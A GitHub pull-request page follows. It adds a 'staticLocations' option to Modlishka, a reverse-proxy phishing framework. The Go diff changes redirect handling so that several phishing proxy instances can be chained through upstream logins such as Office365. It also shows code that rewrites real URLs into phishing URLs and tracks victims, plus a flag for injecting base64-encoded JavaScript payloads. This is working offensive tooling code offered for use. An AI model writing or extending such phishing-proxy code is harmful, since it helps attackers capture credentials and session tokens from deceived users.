Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

adding support for static locations #227

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 2 additions & 0 deletions config/config.go
Original file line number Diff line number Diff line change
Expand Up @@ -29,6 +29,7 @@ type Options struct {
ListeningPortHTTP *int `json:"listeningPortHTTP"`
ListeningPortHTTPS *int `json:"listeningPortHTTPS"`
ProxyAddress *string `json:"proxyAddress"`
StaticLocations *string `json:"staticLocations"`
Target *string `json:"target"`
TargetRes *string `json:"targetResources"`
TargetRules *string `json:"rules"`
Expand Down Expand Up @@ -73,6 +74,7 @@ var (
JsRules: flag.String("jsRules", "", "Comma separated list of URL patterns and JS base64 encoded payloads that will be injected - e.g.: target.tld:base64(alert(1)),..,etc"),

ProxyAddress: flag.String("proxyAddress", "", "Proxy that should be used (socks/https/http) - e.g.: http://127.0.0.1:8080 "),
StaticLocations: flag.String("staticLocations", "", "FQDNs in location headers that should be preserved."),

TrackingCookie: flag.String("trackingCookie", "id", "Name of the HTTP cookie used for track the client"),
TrackingParam: flag.String("trackingParam", "id", "Name of the HTTP parameter used to set up the HTTP cookie tracking of the client"),
Expand Down
Binary file added core/.proxy.go.swp
Binary file not shown.
68 changes: 57 additions & 11 deletions core/proxy.go
Original file line number Diff line number Diff line change
Expand Up @@ -257,32 +257,78 @@ func (httpResponse *HTTPResponse) PatchHeaders(p *ReverseProxy) {
if len(httpResponse.Header["WWW-Authenticate"]) > 0 {
oldAuth := httpResponse.Header.Get("WWW-Authenticate")
newAuth := runtime.RegexpUrl.ReplaceAllStringFunc(oldAuth, runtime.RealURLtoPhish)

log.Debugf("Rewriting WWW-Authenticate: from \n[%s]\n --> \n[%s]\n", oldAuth, newAuth)
httpResponse.Header.Set("WWW-Authenticate", newAuth)
}

//handle 302
if httpResponse.Header.Get("Location") != "" {
oldLocation := httpResponse.Header.Get("Location")
newLocation := runtime.RegexpUrl.ReplaceAllStringFunc(string(oldLocation), runtime.RealURLtoPhish)
// ---- Handle 302 redirects ----
/*
It's often useful to chain Modlishka instances, enabling one to proxy for multiple
applications to achieve some objective. This becomes possible by preventing translation
of FQDN in the original location header to one of our choosing. This is particularly
useful when a base landing page forwards the user to an upstream authentication service
such as Office365, which will redirect the user back to the original service once
authentication is finished.
*/

// Get the current Location header
oldLocation := httpResponse.Header.Get("Location")
if oldLocation != "" {

// Copy the original location to receive updates for the upstream location
newLocation := oldLocation[:]

// Force HTTPS if configured to do so
if runtime.ForceHTTPS == true {
newLocation = strings.Replace(newLocation, "http://", "https://", -1)
} else if runtime.ForceHTTP == true {
newLocation = strings.Replace(newLocation, "https://", "http://", -1)
}

if len(runtime.TargetResources) > 0 {
for _, res := range runtime.TargetResources {
newLocation = strings.Replace(newLocation, res, runtime.RealURLtoPhish(res), -1)
}
}
if len(runtime.ReplaceStrings) > 0 {

log.Debugf("Patching Location header for static redirect")
for k, v := range runtime.ReplaceStrings {
newLocation = strings.ReplaceAll(newLocation,k,v)
}

}

// Handle static location values
// This flag will determine if real FQDNs in the location header should
// be translated into phish FQDNs
static_location := false
if len(runtime.StaticLocations) > 0 {
for _, v := range runtime.StaticLocations{
log.Debugf("Searching location for static signature: %s --> %s",v,newLocation)
if strings.Contains(newLocation,v) {
static_location = true
break
}
}
}

// Translate to Phish URL if the location is not a static location
// This logic is added to enable controlled redirects to upstream Modlishka instances
if !static_location {
log.Debugf("Patching Location header for non-static redirect")
newLocation = runtime.RegexpUrl.ReplaceAllStringFunc(string(oldLocation), runtime.RealURLtoPhish)
if len(runtime.TargetResources) > 0 {
for _, res := range runtime.TargetResources {
newLocation = strings.Replace(newLocation, res, runtime.RealURLtoPhish(res), -1)
}
}
}

// Apply the new header
httpResponse.Header.Set("Location", newLocation)

// Log the event
log.Debugf("Rewriting Location Header [%s] to [%s]", oldLocation, newLocation)
httpResponse.Header.Set("Location", newLocation)
}

// ---- Finished handling 302 redirects ----

return
}

Expand Down
5 changes: 5 additions & 0 deletions core/server.go
Original file line number Diff line number Diff line change
Expand Up @@ -27,6 +27,7 @@ import (
"net"
"net/http"
"strconv"
"strings"
)

var ServerRuntimeConfig *ServerConfig
Expand Down Expand Up @@ -272,6 +273,10 @@ Author: Piotr Duszynski @drk1wi

log.Infof("%s", welcome)

if len(runtime.StaticLocations) > 0 {
log.Infof("Maintained Location Header Targets: %s",strings.Join(runtime.StaticLocations, ", "))
}

go func() {
server := &http.Server{Addr: httplistener, Handler: HTTPServerRuntimeConfig.Handler}
if err := server.ListenAndServe(); err != nil {
Expand Down
6 changes: 6 additions & 0 deletions runtime/vars.go
Original file line number Diff line number Diff line change
Expand Up @@ -39,6 +39,8 @@ var (
ForceHTTPS bool
ForceHTTP bool

StaticLocations []string

//openssl rand -hex 32
RC4_KEY = `1b293b681a3edbfe60dee4051e14eeb81b293b681a3edbfe60dee4051e14eeb8`
)
Expand Down Expand Up @@ -69,6 +71,10 @@ func SetCoreRuntimeConfig(conf config.Options) {
TerminateTriggers = strings.Split(string(*conf.TerminateTriggers), ",")
}

if len(*conf.StaticLocations) != 0 {
StaticLocations = strings.Split(string(*conf.StaticLocations), ",")
}

if len(*conf.TargetRules) != 0 {
ReplaceStrings = make(map[string]string)
for _, val := range strings.Split(string(*conf.TargetRules), ",") {
Expand Down